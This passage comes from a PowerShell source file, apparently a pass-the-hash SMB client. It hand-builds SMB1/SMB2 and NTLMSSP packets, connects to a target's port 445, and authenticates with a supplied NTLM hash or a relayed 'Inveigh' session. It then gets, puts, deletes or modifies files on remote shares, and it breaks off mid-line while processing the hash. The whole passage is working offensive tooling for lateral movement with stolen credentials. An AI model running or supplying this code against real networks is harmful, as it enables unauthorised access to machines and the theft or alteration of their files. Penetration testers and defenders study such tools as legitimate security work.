$SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Offset",[Byte[]](0x10,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Offset",[Byte[]](0x18,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_Length",[Byte[]](0x10,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Tag",[Byte[]](0x44,0x48,0x6e,0x51)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_Data_GUIDHandle",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) if($ExtraInfo -eq 3) { $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_ChainOffset",[Byte[]](0x20,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Offset",[Byte[]](0x10,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Offset",[Byte[]](0x18,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Data_Length",[Byte[]](0x08,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Tag",[Byte[]](0x41,0x6c,0x53,0x69)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementAlSi_AllocationSize",$allocation_size_bytes) } $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Offset",[Byte[]](0x10,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Offset",[Byte[]](0x18,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Data_Length",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Tag",[Byte[]](0x4d,0x78,0x41,0x63)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementMxAc_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) if($ExtraInfo -gt 1) { $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x18,0x00,0x00,0x00)) } else { $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00)) } $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Offset",[Byte[]](0x10,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Offset",[Byte[]](0x18,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Data_Length",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Tag",[Byte[]](0x51,0x46,0x69,0x64)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementQFid_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) if($ExtraInfo -gt 1) { $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_ChainOffset",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Offset",[Byte[]](0x10,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag_Length",[Byte[]](0x04,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Offset",[Byte[]](0x18,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Length",[Byte[]](0x20,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Tag",[Byte[]](0x52,0x71,0x4c,0x73)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Key",$lease_key) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_State",[Byte[]](0x07,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Flags",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("ExtraInfo_ChainElementRqLs_Data_Lease_Duration",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) } } return $SMB2CreateRequest } function New-PacketSMB2FindRequestFile { param ([Byte[]]$FileID,[Byte[]]$Padding) $SMB2FindRequestFile = New-Object System.Collections.Specialized.OrderedDictionary $SMB2FindRequestFile.Add("SMB2FindRequestFile_StructureSize",[Byte[]](0x21,0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_InfoLevel",[Byte[]](0x25)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_Flags",[Byte[]](0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_FileIndex",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_FileID",$FileID) $SMB2FindRequestFile.Add("SMB2FindRequestFile_SearchPattern_Offset",[Byte[]](0x60,0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_SearchPattern_Length",[Byte[]](0x02,0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_OutputBufferLength",[Byte[]](0x00,0x00,0x01,0x00)) $SMB2FindRequestFile.Add("SMB2FindRequestFile_SearchPattern",[Byte[]](0x2a,0x00)) if($padding) { $SMB2FindRequestFile.Add("SMB2FindRequestFile_Padding",$Padding) } return $SMB2FindRequestFile } function New-PacketSMB2QueryInfoRequest { param ([Byte[]]$InfoType,[Byte[]]$FileInfoClass,[Byte[]]$OutputBufferLength,[Byte[]]$InputBufferOffset,[Byte[]]$FileID,[Int]$Buffer) [Byte[]]$buffer_bytes = ,0x00 * $Buffer $SMB2QueryInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2QueryInfoRequest.Add("StructureSize",[Byte[]](0x29,0x00)) $SMB2QueryInfoRequest.Add("InfoType",$InfoType) $SMB2QueryInfoRequest.Add("FileInfoClass",$FileInfoClass) $SMB2QueryInfoRequest.Add("OutputBufferLength",$OutputBufferLength) $SMB2QueryInfoRequest.Add("InputBufferOffset",$InputBufferOffset) $SMB2QueryInfoRequest.Add("Reserved",[Byte[]](0x00,0x00)) $SMB2QueryInfoRequest.Add("InputBufferLength",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2QueryInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2QueryInfoRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2QueryInfoRequest.Add("FileID",$FileID) if($Buffer -gt 0) { $SMB2QueryInfoRequest.Add("Buffer",$buffer_bytes) } return $SMB2QueryInfoRequest } function New-PacketSMB2ReadRequest { param ([Int]$Length,[Int64]$Offset,[Byte[]]$FileID) [Byte[]]$length_bytes = [System.BitConverter]::GetBytes($Length) [Byte[]]$offset_bytes = [System.BitConverter]::GetBytes($Offset) $SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00)) $SMB2ReadRequest.Add("Padding",[Byte[]](0x50)) $SMB2ReadRequest.Add("Flags",[Byte[]](0x00)) $SMB2ReadRequest.Add("Length",$length_bytes) $SMB2ReadRequest.Add("Offset",$offset_bytes) $SMB2ReadRequest.Add("FileID",$FileID) $SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00)) $SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00)) $SMB2ReadRequest.Add("Buffer",[Byte[]](0x30)) return $SMB2ReadRequest } function New-PacketSMB2WriteRequest { param([Int]$Length,[Int64]$Offset,[Byte[]]$FileID,[Byte[]]$Buffer) [Byte[]]$length_bytes = [System.BitConverter]::GetBytes($Length) [Byte[]]$offset_bytes = [System.BitConverter]::GetBytes($Offset) $SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00)) $SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00)) $SMB2WriteRequest.Add("Length",$length_bytes) $SMB2WriteRequest.Add("Offset",$offset_bytes) $SMB2WriteRequest.Add("FileID",$FileID) $SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00)) $SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00)) $SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2WriteRequest.Add("SMB2WriteRequest_Buffer",$Buffer) return $SMB2WriteRequest } function New-PacketSMB2CloseRequest { param ([Byte[]]$FileID) $SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00)) $SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00)) $SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2CloseRequest.Add("FileID",$FileID) return $SMB2CloseRequest } function New-PacketSMB2TreeDisconnectRequest { $SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00)) $SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00)) return $SMB2TreeDisconnectRequest } function New-PacketSMB2SessionLogoffRequest { $SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00)) $SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00)) return $SMB2SessionLogoffRequest } function New-PacketSMB2IoctlRequest() { param([Byte[]]$FileName) $file_name_length = [System.BitConverter]::GetBytes($FileName.Length + 2) $packet_SMB2IoctlRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2IoctlRequest.Add("StructureSize",[Byte[]](0x39,0x00)) $packet_SMB2IoctlRequest.Add("Reserved",[Byte[]](0x00,0x00)) $packet_SMB2IoctlRequest.Add("Function",[Byte[]](0x94,0x01,0x06,0x00)) $packet_SMB2IoctlRequest.Add("GUIDHandle",[Byte[]](0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff)) $packet_SMB2IoctlRequest.Add("InData_Offset",[Byte[]](0x78,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("InData_Length",$file_name_length) $packet_SMB2IoctlRequest.Add("MaxIoctlInSize",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("OutData_Offset",[Byte[]](0x78,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("OutData_Length",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("MaxIoctlOutSize",[Byte[]](0x00,0x10,0x00,0x00)) $packet_SMB2IoctlRequest.Add("Flags",[Byte[]](0x01,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2IoctlRequest.Add("InData_MaxReferralLevel",[Byte[]](0x04,0x00)) $packet_SMB2IoctlRequest.Add("InData_FileName",$FileName) return $packet_SMB2IoctlRequest } function New-PacketSMB2SetInfoRequest { param ([Byte[]]$InfoType,[Byte[]]$FileInfoClass,[Byte[]]$FileID,[Byte[]]$Buffer) [Byte[]]$buffer_length = [System.BitConverter]::GetBytes($Buffer.Count) $SMB2SetInfoRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2SetInfoRequest.Add("StructureSize",[Byte[]](0x21,0x00)) $SMB2SetInfoRequest.Add("InfoType",$InfoType) $SMB2SetInfoRequest.Add("FileInfoClass",$FileInfoClass) $SMB2SetInfoRequest.Add("BufferLength",$buffer_length) $SMB2SetInfoRequest.Add("BufferOffset",[Byte[]](0x60,0x00)) $SMB2SetInfoRequest.Add("Reserved",[Byte[]](0x00,0x00)) $SMB2SetInfoRequest.Add("AdditionalInformation",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2SetInfoRequest.Add("FileID",$FileID) $SMB2SetInfoRequest.Add("Buffer",$Buffer) return $SMB2SetInfoRequest } function New-PacketNTLMSSPNegotiate { param([Byte[]]$NegotiateFlags,[Byte[]]$Version) [Byte[]]$NTLMSSP_length = ([System.BitConverter]::GetBytes($Version.Length + 32))[0] [Byte[]]$ASN_length_1 = $NTLMSSP_length[0] + 32 [Byte[]]$ASN_length_2 = $NTLMSSP_length[0] + 22 [Byte[]]$ASN_length_3 = $NTLMSSP_length[0] + 20 [Byte[]]$ASN_length_4 = $NTLMSSP_length[0] + 2 $NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary $NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60)) $NTLMSSPNegotiate.Add("InitialcontextTokenLength",$ASN_length_1) $NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06)) $NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06)) $NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02)) $NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0)) $NTLMSSPNegotiate.Add("InnerContextTokenLength",$ASN_length_2) $NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30)) $NTLMSSPNegotiate.Add("InnerContextTokenLength2",$ASN_length_3) $NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0)) $NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e)) $NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30)) $NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c)) $NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06)) $NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a)) $NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a)) $NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2)) $NTLMSSPNegotiate.Add("MechTokenLength",$ASN_length_4) $NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04)) $NTLMSSPNegotiate.Add("NTLMSSPLength",$NTLMSSP_length) $NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $NTLMSSPNegotiate.Add("NegotiateFlags",$NegotiateFlags) $NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) if($Version) { $NTLMSSPNegotiate.Add("Version",$Version) } return $NTLMSSPNegotiate } function New-PacketNTLMSSPAuth { param([Byte[]]$NTLMResponse) [Byte[]]$NTLMSSP_length = ([System.BitConverter]::GetBytes($NTLMResponse.Length))[1,0] [Byte[]]$ASN_length_1 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 12))[1,0] [Byte[]]$ASN_length_2 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 8))[1,0] [Byte[]]$ASN_length_3 = ([System.BitConverter]::GetBytes($NTLMResponse.Length + 4))[1,0] $NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary $NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82)) $NTLMSSPAuth.Add("ASNLength",$ASN_length_1) $NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82)) $NTLMSSPAuth.Add("ASNLength2",$ASN_length_2) $NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82)) $NTLMSSPAuth.Add("ASNLength3",$ASN_length_3) $NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82)) $NTLMSSPAuth.Add("NTLMSSPLength",$NTLMSSP_length) $NTLMSSPAuth.Add("NTLMResponse",$NTLMResponse) return $NTLMSSPAuth } function Get-UInt16DataLength { param ([Int]$Start,[Byte[]]$Data) $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0) return $data_length } if($Modify -and $Action -eq 'Put' -and $Source -isnot [Byte[]]) { $output_message = "[-] Source must be a byte array when using -Modify" $startup_error = $true } elseif((!$Modify -and $Source -isnot [String]) -or ($Modify -and $Action -ne 'Put' -and $Source -isnot [String])) { $output_message = "[-] Source must be a string" $startup_error = $true } elseif($Action -eq 'Delete' -and !$Source.StartsWith("\\")) { $output_message = "[-] Source must be a UNC file path" $startup_error = $true } elseif($Source -is [String]) { $source = $Source.Replace('.\','') } if($PSBoundParameters.ContainsKey('Session')) { $inveigh_session = $true } if($PSBoundParameters.ContainsKey('Session')) { if(!$Inveigh) { Write-Output "[-] Inveigh Relay session not found" $startup_error = $true } elseif(!$inveigh.session_socket_table[$session].Connected) { Write-Output "[-] Inveigh Relay session not connected" $startup_error = $true } } $destination = $Destination.Replace('.\','') if($hash -like "*:*") { $hash = $hash.SubString(($hash.IndexOf(":") + 1),32) } if($Domain) { $output_username = $Domain + "\" + $Username } else { $output_username = $Username } $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) [Byte[]]$process_ID = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if(!$inveigh_session) { $client = New-Object System.Net.Sockets.TCPClient $client.Client.ReceiveTimeout = 30000 } $action_step = 0 if($Action -ne 'Put') { $source = $source.Replace('\\','') $source_array = $source.Split('\') $target = $source_array[0] $share = $source_array[1] $source_subdirectory_array = $source.ToCharArray() [Array]::Reverse($source_subdirectory_array) $source_file = -join($source_subdirectory_array) $source_file = $source_file.SubString(0,$source_file.IndexOf('\')) $source_file_array = $source_file.ToCharArray() [Array]::Reverse($source_file_array) $source_file = -join($source_file_array) $target_share = "\\$target\$share" } switch($Action) { 'Get' { if(!$Modify) { if($destination -and $destination -like '*\*') { $destination_file_array = $destination.ToCharArray() [Array]::Reverse($destination_file_array) $destination_file = -join($destination_file_array) $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\')) $destination_file_array = $destination_file.ToCharArray() [Array]::Reverse($destination_file_array) $destination_file = -join($destination_file_array) $destination_path = $destination } elseif($destination) { if(Test-Path (Join-Path $PWD $destination)) { $output_message = "[-] Destination file already exists" $startup_error = $true } else { $destination_path = Join-Path $PWD $destination } } else { if(Test-Path (Join-Path $PWD $source_file)) { $output_message = "[-] Destination file already exists" $startup_error = $true } else { $destination_path = Join-Path $PWD $source_file } } } else { $file_memory = New-Object System.Collections.ArrayList } } 'Put' { if(!$Modify) { if($source -notlike '*\*') { $source = Join-Path $PWD $source } if(Test-Path $source) { [Int64]$source_file_size = (Get-Item $source).Length $source_file = $source if($source_file_size -gt 65536) { $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536) $source_file_size_remainder = $source_file_size % 65536 $source_file_buffer_size = 65536 } else { $source_file_buffer_size = $source_file_size } $source_file_properties = Get-ItemProperty -path $source_file $source_file_creation_time = $source_file_properties.CreationTime.ToFileTime() $source_file_creation_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_creation_time)) $source_file_creation_time = $source_file_creation_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $source_file_last_access_time = $source_file_properties.LastAccessTime.ToFileTime() $source_file_last_access_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_access_time)) $source_file_last_access_time = $source_file_last_access_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $source_file_last_write_time = $source_file_properties.LastWriteTime.ToFileTime() $source_file_last_write_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_write_time)) $source_file_last_write_time = $source_file_last_write_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $source_file_last_change_time = $source_file_last_write_time $source_file_buffer = new-object byte[] $source_file_buffer_size $source_file_stream = new-object IO.FileStream($source_file,[System.IO.FileMode]::Open) $source_file_binary_reader = new-object IO.BinaryReader($source_file_stream) } else { $output_message = "[-] File not found" $startup_error = $true } } else { [Int64]$source_file_size = $Source.Count if($source_file_size -gt 65536) { $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536) $source_file_size_remainder = $source_file_size % 65536 $source_file_buffer_size = 65536 } else { $source_file_buffer_size = $source_file_size } } $destination = $destination.Replace('\\','') $destination_array = $destination.Split('\') $target = $destination_array[0] $share = $destination_array[1] $destination_file_array = $destination.ToCharArray() [Array]::Reverse($destination_file_array) $destination_file = -join($destination_file_array) $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\')) $destination_file_array = $destination_file.ToCharArray() [Array]::Reverse($destination_file_array) $destination_file = -join($destination_file_array) } } if($Action -ne 'Put') { if($source_array.Count -gt 2) { $share_subdirectory = $source.Substring($target.Length + $share.Length + 2) } } else { if($destination_array.Count -gt 2) { $share_subdirectory = $destination.Substring($target.Length + $share.Length + 2) } } if($share_subdirectory -and $share_subdirectory.EndsWith('\')) { $share_subdirectory = $share_subdirectory.Substring(0,$share_subdirectory.Length - 1) } if(!$startup_error -and !$inveigh_session) { try { $client.Connect($target,"445") } catch { $output_message = "[-] $target did not respond" } } if($client.Connected -or (!$startup_error -and $inveigh.session_socket_table[$session].Connected)) { $client_receive = New-Object System.Byte[] 81920 if(!$inveigh_session) { $client_stream = $client.GetStream() if($SMB_version -eq 'SMB2.1') { $stage = 'NegotiateSMB2' } else { $stage = 'NegotiateSMB' } while($stage -ne 'Exit') { try { switch ($stage) { 'NegotiateSMB' { $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID 0x00,0x00 $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data try { $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null if([System.BitConverter]::ToString($client_receive[4..7]) -eq 'ff-53-4d-42') { $SMB_version = 'SMB1' $stage = 'NTLMSSPNegotiate' if([System.BitConverter]::ToString($client_receive[39]) -eq '0f') { if($signing_check) { Write-Output "[+] SMB signing is required on $Target" $stage = 'Exit' } else { Write-Verbose "[+] SMB signing is required" $SMB_signing = $true $session_key_length = 0x00,0x00 $negotiate_flags = 0x15,0x82,0x08,0xa0 } } else { if($signing_check) { Write-Output "[+] SMB signing is not required on $Target" $stage = 'Exit' } else { $SMB_signing = $false $session_key_length = 0x00,0x00 $negotiate_flags = 0x05,0x82,0x08,0xa0 } } } else { $stage = 'NegotiateSMB2' if([System.BitConverter]::ToString($client_receive[70]) -eq '03') { if($signing_check) { Write-Output "[+] SMB signing is required on $Target" $stage = 'Exit' } else { if(!$SMB_signing) { Write-Verbose "[+] SMB signing is required" } $SMB_signing = $true $session_key_length = 0x00,0x00 $negotiate_flags = 0x15,0x82,0x08,0xa0 } } else { if($signing_check) { Write-Output "[+] SMB signing is not required on $Target" $stage = 'Exit' } else { $SMB_signing = $false $session_key_length = 0x00,0x00 $negotiate_flags = 0x05,0x80,0x08,0xa0 } } } } catch { if($_.Exception.Message -like 'Exception calling "Read" with "3" argument(s): "Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host."') { Write-Output "[-] SMB1 negotiation failed" $negoitiation_failed = $true $stage = 'Exit' } } } 'NegotiateSMB2' { if($SMB_version -eq 'SMB2.1') { $message_ID = 0 } else { $message_ID = 1 } $tree_ID = 0x00,0x00,0x00,0x00 $session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $packet_SMB_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $false $message_ID $process_ID $tree_ID $session_ID $packet_SMB_data = New-PacketSMB2NegotiateProtocolRequest $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null $stage = 'NTLMSSPNegotiate' if([System.BitConverter]::ToString($client_receive[70]) -eq '03') { if($signing_check) { Write-Output "[+] SMB signing is required on $target" $stage = 'Exit' } else { if(!$SMB_signing) { Write-Verbose "[+] SMB signing is required" } $SMB_signing = $true $session_key_length = 0x00,0x00 $negotiate_flags = 0x15,0x82,0x08,0xa0 } } else { if($signing_check) { Write-Output "[+] SMB signing is not required on $target" $stage = 'Exit' } else { $SMB_signing = $false $session_key_length = 0x00,0x00 $negotiate_flags = 0x05,0x80,0x08,0xa0 } } } 'NTLMSSPNegotiate' { if($SMB_version -eq 'SMB1') { $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID 0x00,0x00 if($SMB_signing) { $packet_SMB_header["Flags2"] = 0x05,0x48 } $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $negotiate_flags $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } else { $message_ID++ $packet_SMB_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $false $message_ID $process_ID $tree_ID $session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $negotiate_flags 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate $packet_SMB_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data } $client_stream.Write($client_send,0,$client_send.Length) > $null $client_stream.Flush() $client_stream.Read($client_receive,0,$client_receive.Length) > $null $stage = 'Exit' } } } catch { Write-Output "[-] $($_.Exception.Message)" $negoitiation_failed = $true } } if(!$signing_check -and !$negoitiation_failed) { $NTLMSSP = [System.BitConverter]::ToString($client_receive) $NTLMSSP = $NTLMSSP -replace "-","" $NTLMSSP_index = $NTLMSSP.IndexOf("4E544C4D53535000") $NTLMSSP_bytes_index = $NTLMSSP_index / 2 $domain_length = Get-UInt16DataLength ($NTLMSSP_bytes_index + 12) $client_receive $target_length = Get-UInt16DataLength ($NTLMSSP_bytes_index + 40) $client_receive $session_ID = $client_receive[44..51] $NTLM_challenge = $client_receive[($NTLMSSP_bytes_index + 24)..($NTLMSSP_bytes_index + 31)] $target_details = $client_receive[($NTLMSSP_bytes_index + 56 + $domain_length)..($NTLMSSP_bytes_index + 55 + $domain_length + $target_length)] $target_time_bytes = $target_details[($target_details.Length - 12)..($target_details.Length - 5)] $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 